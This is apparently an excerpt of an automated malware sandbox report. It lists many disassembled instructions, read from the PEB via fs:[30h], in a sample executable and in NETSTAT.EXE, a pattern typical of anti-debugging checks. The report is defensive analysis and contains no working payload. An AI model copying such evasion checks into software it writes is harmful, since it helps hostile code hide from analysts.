            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012376E2 mov eax, dword ptr fs:[00000030h]2_2_012376E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012516E0 mov ecx, dword ptr fs:[00000030h]2_2_012516E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01268EC7 mov eax, dword ptr fs:[00000030h]2_2_01268EC7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012536CC mov eax, dword ptr fs:[00000030h]2_2_012536CC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DFEC0 mov eax, dword ptr fs:[00000030h]2_2_012DFEC0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8ED6 mov eax, dword ptr fs:[00000030h]2_2_012F8ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598B58 mov eax, dword ptr fs:[00000030h]8_2_03598B58
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CDB40 mov eax, dword ptr fs:[00000030h]8_2_034CDB40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CF358 mov eax, dword ptr fs:[00000030h]8_2_034CF358
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CDB60 mov ecx, dword ptr fs:[00000030h]8_2_034CDB60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F3B7A mov eax, dword ptr fs:[00000030h]8_2_034F3B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F3B7A mov eax, dword ptr fs:[00000030h]8_2_034F3B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358131B mov eax, dword ptr fs:[00000030h]8_2_0358131B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035453CA mov eax, dword ptr fs:[00000030h]8_2_035453CA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035453CA mov eax, dword ptr fs:[00000030h]8_2_035453CA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EDBE9 mov eax, dword ptr fs:[00000030h]8_2_034EDBE9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F03E2 mov eax, dword ptr fs:[00000030h]8_2_034F03E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D1B8F mov eax, dword ptr fs:[00000030h]8_2_034D1B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D1B8F mov eax, dword ptr fs:[00000030h]8_2_034D1B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358138A mov eax, dword ptr fs:[00000030h]8_2_0358138A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357D380 mov ecx, dword ptr fs:[00000030h]8_2_0357D380
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2397 mov eax, dword ptr fs:[00000030h]8_2_034F2397
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FB390 mov eax, dword ptr fs:[00000030h]8_2_034FB390
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4BAD mov eax, dword ptr fs:[00000030h]8_2_034F4BAD
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4BAD mov eax, dword ptr fs:[00000030h]8_2_034F4BAD
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4BAD mov eax, dword ptr fs:[00000030h]8_2_034F4BAD
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03595BA5 mov eax, dword ptr fs:[00000030h]8_2_03595BA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03554257 mov eax, dword ptr fs:[00000030h]8_2_03554257
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9240 mov eax, dword ptr fs:[00000030h]8_2_034C9240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9240 mov eax, dword ptr fs:[00000030h]8_2_034C9240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9240 mov eax, dword ptr fs:[00000030h]8_2_034C9240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9240 mov eax, dword ptr fs:[00000030h]8_2_034C9240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358EA55 mov eax, dword ptr fs:[00000030h]8_2_0358EA55
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350927A mov eax, dword ptr fs:[00000030h]8_2_0350927A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357B260 mov eax, dword ptr fs:[00000030h]8_2_0357B260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357B260 mov eax, dword ptr fs:[00000030h]8_2_0357B260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598A62 mov eax, dword ptr fs:[00000030h]8_2_03598A62
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D8A0A mov eax, dword ptr fs:[00000030h]8_2_034D8A0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E3A1C mov eax, dword ptr fs:[00000030h]8_2_034E3A1C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CAA16 mov eax, dword ptr fs:[00000030h]8_2_034CAA16
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CAA16 mov eax, dword ptr fs:[00000030h]8_2_034CAA16
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C5210 mov eax, dword ptr fs:[00000030h]8_2_034C5210
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C5210 mov ecx, dword ptr fs:[00000030h]8_2_034C5210
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C5210 mov eax, dword ptr fs:[00000030h]8_2_034C5210
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C5210 mov eax, dword ptr fs:[00000030h]8_2_034C5210
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03504A2C mov eax, dword ptr fs:[00000030h]8_2_03504A2C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03504A2C mov eax, dword ptr fs:[00000030h]8_2_03504A2C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2ACB mov eax, dword ptr fs:[00000030h]8_2_034F2ACB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2AE4 mov eax, dword ptr fs:[00000030h]8_2_034F2AE4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FD294 mov eax, dword ptr fs:[00000030h]8_2_034FD294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FD294 mov eax, dword ptr fs:[00000030h]8_2_034FD294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C52A5 mov eax, dword ptr fs:[00000030h]8_2_034C52A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C52A5 mov eax, dword ptr fs:[00000030h]8_2_034C52A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C52A5 mov eax, dword ptr fs:[00000030h]8_2_034C52A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C52A5 mov eax, dword ptr fs:[00000030h]8_2_034C52A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C52A5 mov eax, dword ptr fs:[00000030h]8_2_034C52A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DAAB0 mov eax, dword ptr fs:[00000030h]8_2_034DAAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DAAB0 mov eax, dword ptr fs:[00000030h]8_2_034DAAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FFAB0 mov eax, dword ptr fs:[00000030h]8_2_034FFAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EB944 mov eax, dword ptr fs:[00000030h]8_2_034EB944
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EB944 mov eax, dword ptr fs:[00000030h]8_2_034EB944
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC962 mov eax, dword ptr fs:[00000030h]8_2_034CC962
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CB171 mov eax, dword ptr fs:[00000030h]8_2_034CB171
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CB171 mov eax, dword ptr fs:[00000030h]8_2_034CB171
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9100 mov eax, dword ptr fs:[00000030h]8_2_034C9100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9100 mov eax, dword ptr fs:[00000030h]8_2_034C9100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9100 mov eax, dword ptr fs:[00000030h]8_2_034C9100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E4120 mov eax, dword ptr fs:[00000030h]8_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E4120 mov eax, dword ptr fs:[00000030h]8_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E4120 mov eax, dword ptr fs:[00000030h]8_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E4120 mov eax, dword ptr fs:[00000030h]8_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E4120 mov ecx, dword ptr fs:[00000030h]8_2_034E4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F513A mov eax, dword ptr fs:[00000030h]8_2_034F513A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F513A mov eax, dword ptr fs:[00000030h]8_2_034F513A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CB1E1 mov eax, dword ptr fs:[00000030h]8_2_034CB1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CB1E1 mov eax, dword ptr fs:[00000030h]8_2_034CB1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CB1E1 mov eax, dword ptr fs:[00000030h]8_2_034CB1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035541E8 mov eax, dword ptr fs:[00000030h]8_2_035541E8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA185 mov eax, dword ptr fs:[00000030h]8_2_034FA185
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EC182 mov eax, dword ptr fs:[00000030h]8_2_034EC182
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F2990 mov eax, dword ptr fs:[00000030h]8_2_034F2990
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035451BE mov eax, dword ptr fs:[00000030h]8_2_035451BE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035451BE mov eax, dword ptr fs:[00000030h]8_2_035451BE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035451BE mov eax, dword ptr fs:[00000030h]8_2_035451BE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035451BE mov eax, dword ptr fs:[00000030h]8_2_035451BE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F61A0 mov eax, dword ptr fs:[00000030h]8_2_034F61A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F61A0 mov eax, dword ptr fs:[00000030h]8_2_034F61A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035469A6 mov eax, dword ptr fs:[00000030h]8_2_035469A6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E0050 mov eax, dword ptr fs:[00000030h]8_2_034E0050
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E0050 mov eax, dword ptr fs:[00000030h]8_2_034E0050
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03582073 mov eax, dword ptr fs:[00000030h]8_2_03582073
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03591074 mov eax, dword ptr fs:[00000030h]8_2_03591074
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547016 mov eax, dword ptr fs:[00000030h]8_2_03547016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547016 mov eax, dword ptr fs:[00000030h]8_2_03547016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547016 mov eax, dword ptr fs:[00000030h]8_2_03547016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03594015 mov eax, dword ptr fs:[00000030h]8_2_03594015
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03594015 mov eax, dword ptr fs:[00000030h]8_2_03594015
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F002D mov eax, dword ptr fs:[00000030h]8_2_034F002D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F002D mov eax, dword ptr fs:[00000030h]8_2_034F002D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F002D mov eax, dword ptr fs:[00000030h]8_2_034F002D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F002D mov eax, dword ptr fs:[00000030h]8_2_034F002D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F002D mov eax, dword ptr fs:[00000030h]8_2_034F002D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DB02A mov eax, dword ptr fs:[00000030h]8_2_034DB02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DB02A mov eax, dword ptr fs:[00000030h]8_2_034DB02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DB02A mov eax, dword ptr fs:[00000030h]8_2_034DB02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DB02A mov eax, dword ptr fs:[00000030h]8_2_034DB02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov eax, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov eax, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov eax, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov eax, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355B8D0 mov eax, dword ptr fs:[00000030h]8_2_0355B8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C58EC mov eax, dword ptr fs:[00000030h]8_2_034C58EC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C9080 mov eax, dword ptr fs:[00000030h]8_2_034C9080
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03543884 mov eax, dword ptr fs:[00000030h]8_2_03543884
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03543884 mov eax, dword ptr fs:[00000030h]8_2_03543884
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F20A0 mov eax, dword ptr fs:[00000030h]8_2_034F20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FF0BF mov ecx, dword ptr fs:[00000030h]8_2_034FF0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FF0BF mov eax, dword ptr fs:[00000030h]8_2_034FF0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FF0BF mov eax, dword ptr fs:[00000030h]8_2_034FF0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035090AF mov eax, dword ptr fs:[00000030h]8_2_035090AF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DEF40 mov eax, dword ptr fs:[00000030h]8_2_034DEF40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034DFF60 mov eax, dword ptr fs:[00000030h]8_2_034DFF60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598F6A mov eax, dword ptr fs:[00000030h]8_2_03598F6A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA70E mov eax, dword ptr fs:[00000030h]8_2_034FA70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA70E mov eax, dword ptr fs:[00000030h]8_2_034FA70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355FF10 mov eax, dword ptr fs:[00000030h]8_2_0355FF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355FF10 mov eax, dword ptr fs:[00000030h]8_2_0355FF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0359070D mov eax, dword ptr fs:[00000030h]8_2_0359070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0359070D mov eax, dword ptr fs:[00000030h]8_2_0359070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EF716 mov eax, dword ptr fs:[00000030h]8_2_034EF716
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C4F2E mov eax, dword ptr fs:[00000030h]8_2_034C4F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034C4F2E mov eax, dword ptr fs:[00000030h]8_2_034C4F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FE730 mov eax, dword ptr fs:[00000030h]8_2_034FE730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035037F5 mov eax, dword ptr fs:[00000030h]8_2_035037F5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547794 mov eax, dword ptr fs:[00000030h]8_2_03547794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547794 mov eax, dword ptr fs:[00000030h]8_2_03547794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03547794 mov eax, dword ptr fs:[00000030h]8_2_03547794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D8794 mov eax, dword ptr fs:[00000030h]8_2_034D8794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D7E41 mov eax, dword ptr fs:[00000030h]8_2_034D7E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358AE44 mov eax, dword ptr fs:[00000030h]8_2_0358AE44
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358AE44 mov eax, dword ptr fs:[00000030h]8_2_0358AE44
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D766D mov eax, dword ptr fs:[00000030h]8_2_034D766D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EAE73 mov eax, dword ptr fs:[00000030h]8_2_034EAE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CC600 mov eax, dword ptr fs:[00000030h]8_2_034CC600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F8E00 mov eax, dword ptr fs:[00000030h]8_2_034F8E00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03581608 mov eax, dword ptr fs:[00000030h]8_2_03581608
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA61C mov eax, dword ptr fs:[00000030h]8_2_034FA61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034FA61C mov eax, dword ptr fs:[00000030h]8_2_034FA61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357FE3F mov eax, dword ptr fs:[00000030h]8_2_0357FE3F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CE620 mov eax, dword ptr fs:[00000030h]8_2_034CE620
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F36CC mov eax, dword ptr fs:[00000030h]8_2_034F36CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598ED6 mov eax, dword ptr fs:[00000030h]8_2_03598ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0357FEC0 mov eax, dword ptr fs:[00000030h]8_2_0357FEC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03508EC7 mov eax, dword ptr fs:[00000030h]8_2_03508EC7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F16E0 mov ecx, dword ptr fs:[00000030h]8_2_034F16E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D76E2 mov eax, dword ptr fs:[00000030h]8_2_034D76E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0355FE87 mov eax, dword ptr fs:[00000030h]8_2_0355FE87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035446A7 mov eax, dword ptr fs:[00000030h]8_2_035446A7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03590EA5 mov eax, dword ptr fs:[00000030h]8_2_03590EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03503D43 mov eax, dword ptr fs:[00000030h]8_2_03503D43
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03543540 mov eax, dword ptr fs:[00000030h]8_2_03543540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034E7D50 mov eax, dword ptr fs:[00000030h]8_2_034E7D50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EC577 mov eax, dword ptr fs:[00000030h]8_2_034EC577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034EC577 mov eax, dword ptr fs:[00000030h]8_2_034EC577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0358E539 mov eax, dword ptr fs:[00000030h]8_2_0358E539
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0354A537 mov eax, dword ptr fs:[00000030h]8_2_0354A537
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03598D34 mov eax, dword ptr fs:[00000030h]8_2_03598D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034F4D3B mov eax, dword ptr fs:[00000030h]8_2_034F4D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034D3D34 mov eax, dword ptr fs:[00000030h]8_2_034D3D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_034CAD30 mov eax, dword ptr fs:[00000030h]8_2_034CAD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov ecx, dword ptr fs:[00000030h]8_2_03546DC9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03546DC9 mov eax, dword ptr fs:[00000030h]8_2_03546DC9
